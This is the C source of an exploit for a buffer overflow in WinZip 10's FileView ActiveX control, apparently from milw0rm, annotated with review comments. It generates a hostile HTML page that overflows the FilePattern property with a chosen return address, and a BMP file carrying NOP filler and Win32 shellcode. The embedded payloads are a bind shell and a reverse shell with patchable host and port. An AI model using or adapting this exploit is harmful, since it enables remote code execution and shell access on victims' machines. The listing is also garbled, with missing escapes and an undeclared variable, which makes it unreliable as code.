zbeng

WinZip 10.0.7245 FileView ActiveX buffer overflow Expl


#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <unistd.h>

#include <getopt.h>

/* Number of one-byte writes of the "x90" literal that main() emits into the
 * image file between the BMP header and the payload. The size is fixed and
 * not reflected in the BMP header, so the generated image is a fixed-layout
 * artefact: header, a ~1 MB run of identical bytes, then non-image data. */
#define NOPSIZE 999999

/* One selectable target: a display label and the 32-bit value that setret()
 * copies into the global `ret` and that main() later writes into the HTML as
 * 4 raw bytes (write(fd,&ret,4)). An `int` is used to hold an address, which
 * assumes a 32-bit int; nothing in the listing checks sizeof(int). */
struct target {

char* name;

int retaddr;

};

/* One selectable payload. `port` and `host` are byte offsets into `shellcode`
 * at which main() patches a 2-byte port / 4-byte address in place; -1 marks a
 * field the payload does not have (main() tests `> -1` before patching). */
struct shellcode {

char* name;   /* label printed by help() and when the entry is selected */

short port;   /* offset of the port field, or -1 if none */

int host;     /* offset of the host-address field, or -1 if none */

char* shellcode;

};

/* Number of entries in targets[]; help() uses it as a loop bound, so it must
 * be kept equal to the initializer below (there is no ARRAY_SIZE-style tie). */
int targetno = 1;

/* Target table. Only index 0 exists; setret() reaches it via the global `ret`
 * rather than via the option value. help() prints each entry with "%s" and
 * "0x%x" but passes the whole struct as the argument, not its fields. */
struct target targets[] = {

{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}

/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */

};

/* Number of entries in shellcodes[]; help() loops over it and main() accepts
 * selections 0 and 1 by explicit case labels rather than by this count. */
int shellno = 2;

/* Payload table. Entry 0 has a port field at offset 162 and no host field
 * (-1); entry 1 has its port field at offset 167 and its address field at
 * offset 160. NOTE(review): as reproduced on this page the escape sequences
 * have no backslashes, so the strings below are plain "x.." text rather than
 * the byte values the offsets above were computed against; treat the listing
 * as a historical artefact, not as a buildable unit. */
struct shellcode shellcodes[] = {

{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,

"x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5"

"x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9"

"xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b"

"x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b"

"x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5"

"x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03"

"x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26"

"x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6"

"x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26"

"x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03"

"xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a"

"x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f"

"x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77"

"x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f"

"x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74"

"x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0"

"xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8"

"x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73"

"xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41"

"xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d"

"xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d"

"x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70"

"xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22"

"x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43"

"x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"},

{"Win32 x86 connect() shellcode (4444/tcp default)",167,160,

"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"

"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"

"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"

"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"

"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"

"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"

"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"

"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"

"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"

"xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68"

"x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9"

"xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68"

"x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3"

"xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab"

"x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"

"x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6"

"x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6"

"xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"}

};

/* First half of the generated page: a VBScript handler for the FileView
 * control's OnAfterItemAdd event that assigns WZFILEVIEW.FilePattern. main()
 * writes this text, then 265 'A' bytes, the 4-byte `ret`, 1827 further 'A'
 * bytes, and then html2 — so the overlong value is the FilePattern property.
 * The "rn" runs and the unescaped quotes are how the original CR/LF and
 * backslash escapes survive on this page; as shown the literal is not a valid
 * C string. */
char html1[]="<HTML>rn<HEAD>rn<TITLE></TITLE>rn</HEAD>rn"

"<BODY>rn<SCRIPT LANGUAGE="VBScript">rnSub WZ"

"FILEVIEW_OnAfterItemAdd(Item)rnWZFILEVIEW.FilePa"

"ttern = ""; /* smash the stack here */

/* Second half: closes the script and instantiates the control by CLSID
 * (CLSID:A09AE68F-B14D-43ED-B713-BA413F034904). For defenders that CLSID is
 * the concrete handle — both for blocking the control from scripting (kill
 * bit) and for content inspection: a page that embeds this OBJECT and drives
 * FilePattern from script is the signature of this generator's output. */
char html2[]=""rnend subrn</SCRIPT>rn%7Boption%7Drn<OBJECT ID="WZFILEV"

"IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A"

"E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r"

"n</BODY>rn</HTML>rn";

/* BMP header written ahead of the filler and payload. It starts with the "BM"
 * magic (0x42 0x4d). The declared file and pixel-data sizes are fixed
 * constants that do not depend on NOPSIZE or on the payload length, so the
 * header's declared size and the file's actual size do not agree — a cheap
 * inconsistency for an image scanner to check. */
char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00"

"x00x28x00x00x00xe7x03x00x00xe7x03x00x00"

"x01x00x18x00x00x00x00x00x08xbbx2dx00x00"

"x00x00x00x00x00x00x00x00x00x00x00x00x00"

"x00x00";

/* Selected return value; 0 until setret() runs. setret() also reads it as an
 * index into targets[] (its case 0), so the index and the value share one
 * variable. */
int ret;

/* Print the usage text, the target table and the payload table, then exit(0).
 * progname: argv[0], echoed into the usage line.
 * Defects visible here and left unchanged: the target loop passes a whole
 * `struct target` where "%s" and "0x%x" expect a string and an int (format/
 * argument mismatch); strlen() results are printed with "%d"; the usage text
 * advertises --shellhost as -i although -i is already --imgname and main()
 * handles 'd'; and <string.h> is not included, so strlen() has no prototype
 * in this listing. */
void help(char* progname){

int count;

printf("[ Usage instructions.n[n");

printf("[ %s <required> (optional)n[n[ --filename|-f <file.html>n",progname);

printf("[ --imgname|-i <image.bmp>n[ --shellcode|-s <shell#>n");

printf("[ --shellport|-p (port)n");

printf("[ --shellhost|-i (ip)n");

printf("[ --target|-t <target#/0xretaddr>n[n");

printf("[ Target#'sn");

/* Loop bound is the hand-maintained targetno, not the array size. */
for(count = 0;count <= targetno - 1;count++){

/* NOTE: targets[count] is a struct; the fields .name / .retaddr were
 * presumably intended here. */
printf("[ %d %s 0x%xn",count,targets[count],targets[count]);

}

printf("[n[ Shellcode#'sn");

for(count = 0;count <= shellno - 1;count++){

printf("[ %d "%s" (length %d bytes)n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));

}

exit(0);

}

/* Resolve the --target argument into the global `ret`.
 * retarg: the option text. It is first passed to atoi(); a result of 0 means
 * "use the target table", any other value means "parse retarg as hex with
 * strtoul()". Because atoi() stops at the 'x' of a "0x..." prefix and yields
 * 0, a prefixed hex address of the form help() advertises also takes the
 * table branch. The table branch indexes targets[] with the current value of
 * `ret` (0 before the first call), not with the argument, and then overwrites
 * `ret` with the address; there is no range check against targetno, so a
 * second -t would index targets[] with an address. Nothing is returned; the
 * result is the side effect on `ret`. */
void setret(char* retarg){

int value = atoi(retarg);

switch(value){

case 0:

/* `ret` is used as the table index here and replaced by the value below. */
printf("[ Using target '%s'n",targets[ret].name);

ret = targets[ret].retaddr;

break;

default:

/* Unsigned long narrowed into int; no check of the parse (endptr unused). */
ret = strtoul(retarg,NULL,16);

printf("[ Using return address '0x%x'n",ret);

break;

}

}

/* Entry point: parse the command line, then emit two files — an image
 * (bmphdr + NOPSIZE filler bytes + the selected payload) and an HTML page
 * (html1 + 265 'A' + the 4-byte `ret` + 1827 'A' + html2 + the image path +
 * html3). Returns nothing explicitly; errors call exit().
 * Defects visible in this listing, left unchanged: `c` is read by the loop
 * condition before it is ever assigned; `file` and `img` are indeterminate
 * pointers that reach strlen() when -f/-i are omitted; `html3` is not declared
 * anywhere on this page; memset/memcpy/strlen and inet_addr are used without
 * <string.h> / <arpa/inet.h>; `fd` is unsigned long yet compared with -1;
 * every write() result is ignored; open() uses O_CREAT without O_TRUNC, so an
 * existing output file keeps any bytes beyond what is written; the image
 * error path prints `file` instead of `img`; the getopt string accepts -D
 * while the switch handles 'd'; `shellport2` is assigned but never read.
 * "switch©" is presumably a rendering artefact of the original switch on c. */
int main(int argc, char* argv[]){

unsigned long i, fd;

int c, index, payg, paya, lhost;

short shellport, shellport2;

int ishell = 0, itarg = 0;

char *buffer, *file, *img, *payload;

/* Long-option table; the third field is 0, so getopt_long returns `val`. */
static struct option options[] = {

{"filename", 1, 0, 'f'},

{"imgname", 1, 0, 'i'},

{"target", 1, 0, 't'},

{"shellcode", 1, 0, 's'},

{"shellport", 1, 0, 'p'},

{"shellhost", 1, 0, 'd'},

{"help", 0, 0,'h'}

};

printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploitn");

/* `c` is uninitialized on the first evaluation of this condition. */
while(c != -1){

c = getopt_long(argc,argv,"f:i:t:s:p:D:h",options,&index);

switch©{

case 'f':

file = optarg;

break;

case 'i':

img = optarg;

break;

case 't':

itarg = 1;

setret(optarg);

/* Reads the 4 bytes of `ret` as a C string: a length under 4 means the
 * address contains a zero byte. When none of its bytes is zero strlen()
 * walks past `ret`, which is undefined behaviour even though the result
 * is then >= 4 and the check passes. */
if(strlen((char*)&ret) < 4){

fprintf(stderr,"[ Selected target contains a null address!n");

exit(-1);

}

break;

case 's':

/* Only the first -s is honoured; later ones are silently ignored. */
if(ishell==0){

payg = atoi(optarg);

switch(payg){

/* case 0 and case 1 are identical: copy the selected string into a
 * fresh NUL-terminated heap buffer owned by `payload` (never freed). */
case 0:

printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));

payload = malloc(strlen(shellcodes[payg].shellcode)+1);

memset(payload,0,strlen(shellcodes[payg].shellcode)+1);

memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));

shellport2 = 4444;

ishell = 1;

break;

case 1:

printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));

payload = malloc(strlen(shellcodes[payg].shellcode)+1);

memset(payload,0,strlen(shellcodes[payg].shellcode)+1);

memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));

shellport2 = 4444;

ishell = 1;

break;

default:

printf("[ Invalid shellcode selection %dn",payg);

exit(0);

break;

}

}

break;

case 'p':

/* Requires -s to have been seen first (option order matters). */
if(ishell==1){

if(shellcodes[payg].port > -1){

/* Length before the patch; compared afterwards to detect a patched-in
 * zero byte, which would truncate the string-based length. */
paya = strlen(payload);

shellport = atoi(optarg);

shellport2 = shellport;

/* Byte-swap the 16-bit value before copying it over the port field. */
shellport =(shellport&0xff)<<8 | shellport>>8;

memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));

if(paya > strlen(payload)) {

printf("[ Error shellcode port introduces null bytesn");

exit(1);

}

printf("[ Shellcode port changed to '%u'n",atoi(optarg));

}

else{

printf("[ (%s) port selection is ignored for current shellcoden",optarg);

}

}

else{

printf("[ No shellcode selected yet, ignoring (%s) port selectionn",optarg);

}

break;

case 'd':

if(ishell==1){

if(shellcodes[payg].host > -1){

paya = strlen(payload);

/* inet_addr() has no prototype here; <arpa/inet.h> is not included. */
lhost = inet_addr(optarg);

memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));

if(paya > strlen(payload)){

printf("[ Error shellhost introduces null bytesn");

exit(1);

}

printf("[ Shellhost has been changed to '%s'n",optarg);

}

else{

printf("[ (%s) shellhost selection is ignored for current shellcoden",optarg);

}

}

else {

printf("[ No shellcode selected yet, ignoring (%s) shellhost selectionn",optarg);

}

break;

case 'h':

help(argv[0]);

break;

default:

break;

}

}

/* `file` and `img` are never initialized, so omitting -f or -i dereferences
 * an indeterminate pointer here instead of reaching the usage message. */
if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){

printf("[ Error insufficient arguements, try running '%s --help'n",argv[0]);

exit(0);

}

// create image

printf("[ Creating image containing shellcode '%s'n",img);

/* O_CREAT without O_TRUNC: a pre-existing, longer file is overwritten only
 * up to the number of bytes written below. */
fd = open(img,O_RDWR|O_CREAT,S_IRWXU);

/* `fd` is unsigned long; the comparison relies on -1 converting to ULONG_MAX. */
if(fd == -1){

/* Message names `file` although the failing path is `img`. */
fprintf(stderr,"[ Error creating %sn",file);

exit(-1);

}

/* sizeof(bmphdr) includes the terminating NUL of the literal. */
write(fd,bmphdr,sizeof(bmphdr));

/* One syscall per filler byte; NOPSIZE is ~1e6 writes. */
for(i = 0;i < NOPSIZE;i++){

write(fd,"x90",1);

}

write(fd,payload,strlen(payload));

close(fd);

// create html

printf("[ Creating html exploit page '%s'n",file);

fd = open(file,O_RDWR|O_CREAT,S_IRWXU);

if(fd == -1){

fprintf(stderr,"[ Error creating %sn",file);

exit(-1);

}

/* Page layout: html1, 265 'A', raw 4-byte `ret`, 1827 'A', html2, the image
 * path as given on the command line, then html3. */
write(fd,html1,strlen(html1));

for(i = 0;i < 265;i++){

write(fd,"A",1);

}

/* Writes 4 bytes regardless of sizeof(ret). */
write(fd,&ret,4);

for(i = 0;i < 1827;i++){

write(fd,"A",1);

}

write(fd,html2,strlen(html2));

write(fd,img,strlen(img));

/* `html3` is not declared anywhere in this listing. */
write(fd,html3,strlen(html3));

close(fd);

}

// milw0rm.com [2006-11-15]
